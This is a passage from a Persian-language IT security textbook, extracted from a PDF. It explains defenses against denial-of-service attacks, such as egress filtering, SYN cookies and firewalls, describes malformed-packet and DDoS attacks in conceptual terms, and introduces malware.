ﺩﺭ ﺍﻳﻨﺠﺎ ﻫﻢ ﺩﺍﺷﺘﻦ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻣﺠﺰﺍ ﺑﺮﺍﻱ ﻧﻈﺎﺭﺕ ﻭ ﺗﻔﻜﻴﻚ ﺷﺒﻜﻪ ﺑﻪ ﭼﻨﺪ ﺯﻳﺮﺷﺒﻜﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﻳﻦ ﺩﺳﺘﻪ ﻣـﺸﻜﻼﺕ ﻛﻤـﻚ
ﻛﻨﺪ ،ﻫﺮﭼﻨﺪ ﻛﻪ ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﺭﺍﻩﺣﻠﻬﺎ ﻗﺎﺩﺭ ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺎﻣﻞ ﺍﺯ ﺍﻳﻦ ﻣـﺸﻜﻼﺕ ﻧﻴـﺴﺘﻨﺪ .ﻫﻤﭽﻨـﻴﻦ ﺑﺮﺧـﻲ ﺍﺯ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ
ﻝ ﺳﺮﻋﺖ ﺍﺗﺼﺎﻝ" ﺍﺯ ﺗﺄﺛﻴﺮ ﺍﻳﻦ ﺣﻤﻼﺕ ﺑﻜﺎﻫﻨﺪ .ﺑﺮﻧﺎﻣـﺔ netfilterﺩﺭﻏﺮﺑﺎﻝﺳﺎﺯ ﺑﺴﺘﻪﻫﺎ )ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻳﺎ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻴﺰﺑﺎﻥ( ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ "ﻛﻨﺘﺮ ﹺ
ﻫﺴﺘﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ Linux 2.4ﻧﻤﻮﻧﺔ ﺧﻮﺑﻲ ﺍﺯ ﺍﻳﻦ ﻗﺒﻴﻞ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺳﺖ.
ﭘﻴﻜﺮﺑﻨﺪﻱ ﺻﺤﻴﺢ ﺗﻤﺎﻡ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻭ ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻣﻬﺎﻱ ﻋﺎﻡﮔـﺴﺘﺮ ﺍﺯ ﻣﻴﺰﺑﺎﻧﻬـﺎﻱ ﻏﻴﺮﻣﺠـﺎﺯ ،ﺑـﺴﻴﺎﺭ ﺑـﺎ
ﺍﻫﻤﻴﺖ ﺍﺳﺖ .ﺑﻬﺘﺮ ﺍﺳﺖ ﺑﺮﺍﻱ ﺍﻃﻼﻉ ﺍﺯ ﭼﮕﻮﻧﮕﻲ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻣﺴﺘﻨﺪﺍﺕ ﻓﺮﻭﺷﻨﺪﻩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ .ﺳـﻨﺪ ﻣـﺸﺎﻭﺭﻩﺍﻱ CERT/CCﺑـﻪ
ﺷﻤﺎﺭﺓ ) CA-1998-01ﻛﻪ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺁﻥ ﻣﻮﺟﻮﺩ ﺍﺳﺖ( ﺟﺰﺋﻴﺎﺕ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺞ ﺑﺮﺍﻱ ﺗﻮﻗﻒ ﻭ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑﺮﻭﺯ
ﭼﻨﻴﻦ ﺍﺭﺳﺎﻟﻬﺎﻳﻲ ﺭﺍ ﺷﺮﺡ ﺩﺍﺩﻩ ﺍﺳﺖ.
ﺑﻴﺸﺘﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﻬﺎﺟﻢ ﻛﻪ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ ﺍﺯ ﺁﺩﺭﺳﻬﺎﻱ ﺗﺼﺎﺩﻓﻲ ﺑﻌﻨﻮﺍﻥ ﺁﺩﺭﺱ ﻣﺒﺪﺃ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ ﺗـﺎ
ﺍﺣﺘﻤﺎﻝ ﺁﺷﻜﺎﺭ ﺷﺪﻥ ﺣﻤﻠﻪ ﺭﺍ ﻛﺎﻫﺶ ﺩﻫﻨﺪ .ﺩﺭﻧﺘﻴﺠﻪ ﺻﺎﻓﻴﻬﺎﻱ ﺧﺮﻭﺟﻲ ﺭﻭﻱ ﻣـﺴﻴﺮﻳﺎﺑﻬﺎﻱ ﻣـﺮﺯﻱ ،ﻫـﺮ ﺍﺯ ﭼﻨـﺪﮔﺎﻩ ﺟﻠـﻮﻱ ﻣـﺸﺎﺭﻛﺖ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺒﻜﻪ ﺩﺭ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺭﺍ ﻣﻲﮔﻴﺮﻧﺪ -ﻭ ﺍﮔﺮ ﺁﻧﻬﺎ ﻫﻤﭽﻨﺎﻥ ﺩﺭ ﺍﻳﻦ ﺣﻤﻼﺕ ﺩﺭﮔﻴﺮ ﺑﺎﻗﻲ ﺑﻤﺎﻧﻨﺪ ،ﺳﺎﺩﻩﺗﺮ
ﻣﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺭﺩﻳﺎﺑﻲ ﻛﺮﺩ ،ﭼﻮﻥ ﺑﺴﺘﻪﻫﺎﻱ ﺣﻤﻠﻪ ﺩﺍﺭﺍﻱ ﺁﺩﺭﺳﻬﺎﻱ ﺑﺎﺯﮔﺸﺖ ﺻﺤﻴﺤﻲ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ.
cookieﻫﺎﻱ SYNﺗﻮﺳﻂ ﺩﺍﻧﻴﹺﻞ ﺑﺮﻧﺸﺘﺎﻳﻦ ٣١٥ﺍﺑﺪﺍﻉ ﺷﺪﻧﺪ ﻭ ﺩﺭ ﺁﺩﺭﺱ http://cr.yp.to/syncookies.htmlﺑﻪ ﺗﻔﺼﻴﻞ ﺩﺭ ﻣـﻮﺭﺩ
ﺁﻧﻬﺎ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ .ﺳﻴﺴﺘﻤﻬﺎﻱ BSDﻭ Linuxﺣﺎﻭﻱ ﻳﻚ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﺯ cookieﻫﺎﻱ SYNﻫﺴﺘﻨﺪ) .ﺍﻟﺒﺘﻪ ﺍﻳﻦ ﮔﺰﻳﻨﻪ ﺑﺎﻳﺪ ﺩﺭ
ﺳﻴﺴﺘﻤﻬﺎﻱ Linuxﺻﺮﺍﺣﺘﹰﺎ ﻓﻌﺎﻝ ﺷﻮﺩ(.
ﺑﺮﺧﻲ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﻧﺤﻮﺓ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﺍﺗﺼﺎﻟﻬﺎﻱ ﻧﻴﻤﻪﺑﺎﺯ ﺩﺭ ﺻﻒ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ .ﻣﻲﺗﻮﺍﻧﻴﺪ ﻃـﻮﻝ ﺻـﻒ ﺭﺍ ﺯﻳـﺎﺩ
ﻛﻨﻴﺪ ،ﻭ ﻳﺎ ﺯﻣﺎﻥ ﺣﻴﺎﺕ ﺍﺗﺼﺎﻟﻬﺎﻱ ﻧﻴﻤﻪﺑﺎﺯ ﺭﺍ ﻛﺎﻫﺶ ﺩﻫﻴﺪ .ﺍﻳﻦ ﺭﻭﺵ ﻧﻴﺰ ﺍﺯ ﻧﻈﺮ ﺷﻜﻞ ﻛﺎﺭﻛﺮﺩ ﻏﻴﺮﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﺳﺖ ﻭ ﺩﺭﺻﻮﺭﺕ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ
ﺁﻥ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺧﻲ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﺑﻪ ﺩﺳﺘﻜﺎﺭﻱ ﻣﺘﻐﻴﺮﻫﺎﻱ ﻫﺴﺘﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻧﻴﺎﺯ ﭘﻴﺪﺍ ﻛﻨﻨﺪ .ﺑـﺮﺍﻱ ﻣـﻮﺍﺭﺩ ﺧـﺎﺹ ﺑـﻪ ﺗﻮﻟﻴﺪﻛﻨﻨـﺪﺓ
ﻣﺤﺼﻮﻻﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺧﻮﺩ ﺭﺟﻮﻉ ﻛﻨﻴﺪ.
٣١٦
ﺣﻤﻼﺕ ﺗﺮﺍﻓﻴﻚ ﺑﺪﺷﻜﻞ
ﺩﺭ ﮔﺬﺷﺘﻪ ،ﺍﺷﻜﺎﻻﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺳﻄﻮﺡ ﭘﺎﻳﻴﻦ ﺷﺒﻜﻪ ﺑﺎﻋﺚ ﻣﻲﺷﺪﻧﺪ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺭ ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﻳﻚ ﺑﺴﺘﻪ ﻳﺎ ﺩﺭﺧﻮﺍﺳﺖ ﺑﺪﺷﻜﻞHTTP
ﺍﺯ ﻛﺎﺭ ﺑﻴﺎﻓﺘﻨﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻧﻮﻋﻲ ﺣﻤﻠﻪ ﻣﻌﺮﻭﻑ ﺑﻪ ﭘﮋﻭﺍﮎ ﻣﺮﮒ ٣١٧ﻫﺮﺩﻭﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ Windowsﻭ Unixﺭﺍ ﺑﺎ ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﺑﺴﺘﺔ
ICMPﻛﻪ ﻃﻮﻻﻧﻲﺗﺮ ﺍﺯ ﺍﻧﺪﺍﺯﺓ ﻣﺠﺎﺯ ﺑﻮﺩ ﺍﺯ ﻛﺎﺭ ﻣﻲﺍﻧﺪﺍﺧﺖ .ﺗﺠﻬﻴﺰﺍﺕ ﺷﺒﻜﻪﺍﻱ ﺯﻳﺎﺩﻱ ﺍﺯ ﺟﻤﻠﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭼﺎﭘﮕﺮ ،ﺩﻳﻮﺍﺭﻩﻫﺎﻱ
ﺁﺗﺶ ﺧﺎﻧﮕﻲ ،ﻭ ﺣﺘﻲ ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ،ﻫﻨﮕﺎﻣﻴﮑﻪ ﺑﺪﻧﺒﺎﻝ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ IISﻳﺎ Apacheﻛﺎﻭﺵ ﻣﻲﺷﺪﻧﺪ ،ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩﻩﺍﻧﺪ .ﺑﻄﻮﺭ ﻛﻠﻲ ﺗﻨﻬﺎ
ﺭﺍﻩ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺗﺮﺍﻓﻴﻚ ﺑﺪﺷﻜﻞ ،ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺑﻌﻨﻮﺍﻥ proxyﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺑﻪﺭﻭﺯ ﺑﻮﺩﻥ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺳﺖ.
٣٢٠
DDoSﺭﺍ ﻣﻲﮔﻴﺮﺩ.
ﺣﻤﻼﺕ DDoSﻧﻴﺎﺯ ﺑﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﺎﺻﻲ ﻧﺪﺍﺭﻧﺪ .ﻳﻚ ﺷﻜﻞ ﺣﻤـﻼﺕ DDoSﺗﻨﻬـﺎ ﺑـﺎ ﻓﺮﺳـﺘﺎﺩﻥ ﺑـﺴﺘﻪﻫـﺎﻱ ﭘـﮋﻭﺍﻙ ٣٢١ICMPﺑـﺎ
ﺁﺩﺭﺳﻬﺎﻱ ﻣﺒﺪﺃ ﻗﻼﺑﻲ ﺑﻪ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﺘﺼﻞ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﻧﺠﺎﻡ ﻣﻲﮔﻴﺮﺩ ،ﭼﺮﺍﻛﻪ ﭘﺎﺳﺦ ﻣﺮﺑﻮﻁ ﺑﻪ ﺑﺴﺘﻪﻫﺎ ﺑﻪ ﺭﺍﻳﺎﻧـﺔ ﻗﺮﺑـﺎﻧﻲ
ﺑﺮﮔﺸﺖ ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﺭﻭﺷﻲ ﺩﻳﮕﺮ ،ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻌﺪﺍﺩﻱ ﺍﺗﺼﺎﻝ TCPﺍﺯ ﺁﺩﺭﺳﻬﺎﻱ IPﻧﺎﻣﻮﺟﻮﺩ ﺗـﻼﺵ ﻣـﻲﺷـﻮﺩ .ﻣﺎﺷـﻴﻦ
ﻣﻘﺼﺪ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﺍﻳﻦ ﺗﻼﺷﻬﺎﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺗﺼﺎﻝ ﺑﺎﻳﺪ ﻣﻨﺎﺑﻌﻲ ﻣﺼﺮﻑ ﻛﻨﺪ ﻭ ﺍﮔﺮ ﺗﻌﺪﺍﺩ ﺍﻳﻦ ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﺍﺯ ﺣﺪ ﻣﻌﻴﻨﻲ ﺑﻴﺸﺘﺮ ﺑﺎﺷﺪ ،ﺍﻧﺠﺎﻡ
ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺎﺷﻴﻦ ﺭﺍ ﻓﻠﺞ ﻛﻨﺪ.
ﺑﻌﻀﻲ ﻣﻮﺍﻗﻊ ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﺗﻐﻴﻴﺮ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﻭ ﺁﺩﺭﺱ IPﻣﺎﺷﻴﻦ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ،ﺑﺮ ﺣﻤﻠﺔ DDoSﻏﻠﺒﻪ ﻛﺮﺩ .ﺍﮔﺮ ﻧـﺎﻡ ﻣﻴﺰﺑـﺎﻥ ﻳـﺎ ﺁﺩﺭﺱ IP
ﻗﺮﺑﺎﻧﻲ ﺩﺭﻭﻥ ﻛﺪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ ،ﺑﺎ ﺗﻐﻴﻴﺮ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻣﻴﺰﺑﺎﻥ ﻗﺮﺑﺎﻧﻲ ﻣﺤﺎﻓﻈﺖ ﻧﻤﻮﺩ ﻭ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺑـﺴﺘﻪﻫـﺎﻳﻲ
ﻛﻪ ﺑﻪ ﺁﺩﺭﺱ ﻗﺒﻠﻲ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺗﻮﺳﻂ ﻣﺴﻴﺮﻳﺎﺏ ﺧﺎﺭﺟﻲ ﻳﺎ ISPﺳﺎﺯﻣﺎﻥ ﻏﺮﺑـﺎﻝ ﻣـﻲﺷـﻮﻧﺪ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ ،ﻛـﺮﻡ Blasterﺩﺭ
ﺁﮔﻮﺳﺖ ٢٠٠٣ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩ ﺗﺎ ﻳﻚ ﺣﻤﻠﺔ DDoSﺭﺍ ﻋﻠﻴﻪ ﺁﺩﺭﺳﻲ ﻣﺘﻌﻠﻖ ﺑﻪ ﺳـﺮﻭﻳﺲ ﺑـﻪ ﺭﻭﺯ ﺭﺳـﺎﻧﻲ Microsoft Windows
ﺁﻏﺎﺯ ﻛﻨﺪ ،ﺍﻣﺎ ﭼﻮﻥ ﺍﻳﻦ ﺁﺩﺭﺱ ﺩﺭ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩ ﺑﻮﺩ ،ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﺴﺎﺩﮔﻲ ﺗﻮﺍﻧﺴﺖ ﺑﺎ ﺗﻐﻴﻴﺮ ﺁﺩﺭﺱ IPﭘﺎﻳﮕﺎﻩ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ
٣٢٢
،Windowsﺍﻳﻦ ﺗﻬﺪﻳﺪ ﺭﺍ ﺭﻓﻊ ﻛﻨﺪ.
ﺗﻬﺪﻳﺪﺍﺕ ﺑﺮﻧﺎﻣﻪﺍﻱ
ﻻ ﻛﺎﺭﻫﺎﻱ ﻣﻔﻴﺪﻱ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ ،ﻣﻘﺎﺩﻳﺮﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ﺑﺼﻮﺭﺕ ﺗﺮﺗﻴﺒﻲ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ .ﺍﻳﻦ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ﻣﻌﻤﻮ ﹰ
ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻣﻲﻛﻨﻨﺪ ،ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﺍﻱ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻧﻤﺎﻳﻨﺪ ﻭ ﺑﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻨﺪ .ﺍﻣﺎ ﺍﻳـﻦ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ
ﮔﺎﻫﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺫﺍﺗﹰﺎ ﻣﺨﺮﺏ ﻳﺎ ﺑﺪﺧﻮﺍﻫﺎﻧﻪ ﺑﺎﺷﻨﺪ .ﺍﮔﺮ ﺻﺪﻣﺔ ﻭﺍﺭﺩﻩ ﺍﺗﻔﺎﻗﻲ ﺑﺎﺷﺪ ،ﺑﻪ ﻛﺪ ﻣﺮﺑﻮﻃﻪ "ﺍﺷﻜﺎﻝ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ" ﻣﻲﮔﻮﻳﻨﺪ .ﺷﺎﻳﺪ ﺍﻳـﻦ
ﺍﺷﻜﺎﻻﺕ ﻣﻌﻤﻮﻟﺘﺮﻳﻦ ﺩﻟﻴﻞ ﺭﻓﺘﺎﺭﻫﺎﻱ ﻏﻴﺮﻣﻨﺘﻈﺮﺓ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﺎﺷﻨﺪ .ﺍﻣﺎ ﺍﮔﺮ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﻣﺨﺮﺏ ﺍﺯ ﻃﺮﻑ ﺷﺨﺼﻲ ﺑﺎﺷﺪ ﻛـﻪ ﻣﻨﻈـﻮﺭﺵ
٣٢٤
ﺭﺧﺪﺍﺩ ﻫﻤﺎﻥ ﺭﻓﺘﺎﺭ ﻏﻴﺮﻣﻌﻤﻮﻝ ﺑﻮﺩﻩ ،ﺑﻪ ﺁﻥ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ "ﺑﺮﻧﺎﻣﺔ ﺑﺪﺧﻮﺍﻫﺎﻧﻪ" ﻳﺎ "ﺗﻬﺪﻳﺪ ﺑﺮﻧﺎﻣﻪﺍﻱ" ﻣﻲﮔﻮﻳﻨﺪ .ﺑﺮﺧﻲ ﺍﻓﺮﺍﺩ ﻛﻠﻤﺔ ﺑـﺪﺍﻓﺰﺍﺭ
)ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ( ﺭﺍ ﺑﺮﺍﻱ ﭼﻨﻴﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ.
ﺍﻳﻦ ﺭﻭﺯﻫﺎ ﺑﻴﺸﺘﺮ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺼﻮﺭﺕ ﭘﻴﺎﻣﻬﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﺎ ﺣﻤﻠﻪﺍﻱ ﻣﺴﺘﻘﻴﻢ ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ
ﺷﺒﻜﻪﺍﻱ ﻣﻲﺁﻳﻨﺪ .ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﺎ ﻳﻚ ﺣﻤﻠﺔ ﻣﺴﺘﻘﻴﻢ ﻣﻲﺗﻮﺍﻧﺪ ﻭﺍﻗﻌﻪﺍﻱ ﺗﺼﺎﺩﻓﻲ )ﻳﻌﻨـﻲ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ ﺷـﻤﺎ ﺗـﺼﺎﺩﻓﹰﺎ
ﺍﻧﺘﺨﺎﺏ ﺷﺪﻩ ﺑﺎﺷﺪ( ﻳﺎ ﻋﻤﺪﻱ ﺑﺎﺷﺪ ،ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺣﻤﻠﺔ ﻫﺪﺍﻳﺖﺷﺪﻩ ﺍﺷﺘﺒﺎﻫﹰﺎ ﺗﺒﺪﻳﻞ ﺑﻪ ﺣﻤﻠﻪﺍﻱ ﺗﺼﺎﺩﻓﻲ ﺷﻮﺩ ﻭ ﻳﺎ ﺑﺎﻟﻌﻜﺲ .ﺣﻤـﻼﺕ
ﻫﺪﺍﻳﺖﺷﺪﻩ ﺑﺴﻴﺎﺭ ﻧﮕﺮﺍﻥﻛﻨﻨﺪﻩﺗﺮ ﺍﺯ ﺣﻤﻼﺕ ﺗﺼﺎﺩﻓﻲ ﻫﺴﺘﻨﺪ ،ﭼﺮﺍﻛﻪ ﻳﻚ ﻣﻬﺎﺟﻢ ﺑﺎ ﺍﻧﮕﻴﺰﻩ ﺗﺎ ﺯﻣـﺎﻧﻲ ﻛـﻪ ﻣﻮﻓـﻖ ﻳـﺎ ﻣﺘﻮﻗـﻒ ﺷـﻮﺩ ﺑـﻪ
ﺣﻤﻼﺗﺶ ﻫﻤﭽﻨﺎﻥ ﺍﺩﺍﻣﻪ ﺧﻮﺍﻫﺪ ﺩﺍﺩ.
۳۲۲ﻳﻜﻲ ﺍﺯ ﻣﻌﺮﻭﻓﺘﺮﻳﻦ ﺣﻤﻼﺕ DDoSﺩﺭ ﻓﻮﺭﻳـﺔ ۲۰۰۰ﻋﻠﻴـﻪ ﺩﻭ ﺷـﺮﻛﺖ ﭘﺮﻣـﺸﺘﺮﻱ Yahooﻭ Amazonﺻـﻮﺭﺕ ﮔﺮﻓـﺖ .ﺗﺤﻠﻴﻠـﻲ ﺑـﺮ ") "trinooﺗﺮﺍﻭﺍﻳـﻲ ﻛـﻪ
zombieﻫﺎﻱ ﺩﺧﻴﻞ ﺩﺭ ﺍﻳﻦ ﺣﻤﻠﻪ ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﺮﺩ( ﺩﺭ ﺁﺩﺭﺱ ﺭﻭﺑﺮﻭ ﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ:
http://www.sans.org/newlook/resources/IDFAQ/trinoo.htm
ﻼ ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ﺍﺳﺖ .ﺟﺎﻟﺐ ﺍﺳﺖ ﻛﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻫﻨﻮﺯ ﻫﻢ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﻨﺪ ﻛـﻪ ﺑـﻪ ﺍﻳـﻦ ﺭﻭﺵ ﻣـﻲﺗﻮﺍﻧﻨـﺪ
۳۲۳ﺍﻳﻦ ﺷﻜﻞ ﺣﻤﻠﻪ ﻋﻤﺮﻱ ۳۵ﺳﺎﻟﻪ ﺩﺍﺭﺩ ﻭ ﻛﺎﻣ ﹰ
ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻭ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ.
324 Malware
٤١٧ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ﻋﻮﺍﻣﻞ ﻧﺎﺧﻮﺍﺳﺘﻪﺍﻱ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﻭﻳﺮﻭﺳﻬﺎ ،ﻛﺮﻣﻬﺎ ﻭ ﺳﺎﻳﺮ ﺗﻬﺪﻳﺪﻫﺎ ﺗﺒﺪﻳﻞ ﺷﻮﻧﺪ .ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﻧﺼﺐ ﻳـﻚ
ﺑﺮﻧﺎﻣﺔ ﻧﺎﺷﻨﺎﺧﺘﻪ ،ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺏ ﺩﺭﻭﻥ ﺁﻧﺮﺍ ﻧﻴﺰ ﻧﺼﺐ ﻛﻨﻨﺪ .ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﻣﺤﺎﻓﻆ ﻧﻤﺎﻳﺸﮕﺮ ﺍﺟﺮﺍ ﻛﻨﻨﺪ ﻛﻪ ﺣﺎﻭﻱ ﻳﻚ ﺍﺳﺐ ﺗـﺮﺍﻭﺍ
ﺑﺎﺷﺪ .ﺍﻟﺒﺘﻪ ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﻧﺪ ،ﻫﻴﭽﮕﻮﻧﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺑﻲ ﻧﺪﺍﺭﻧﺪ .ﺍﻣـﺎ ﺑـﻪ ﻫﺮﺣـﺎﻝ ﮔـﺮﻓﺘﻦ ﻭ ﺍﺟـﺮﺍﻱ
ﺑﻲﺭﻭﻳﺔ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺯ ﻣﻨﺎﺑﻊ ﻧﺎﻣﻌﺘﺒﺮ ،ﺍﺣﺘﻤﺎﻝ ﻣﻮﻓﻖﺷﺪﻥ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺮﺏ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﻣﻲﺩﻫﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺎﻳﺪ ﺩﺭ ﺩﺭﻳﺎﻓﺖ ﻣﺘﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻭ
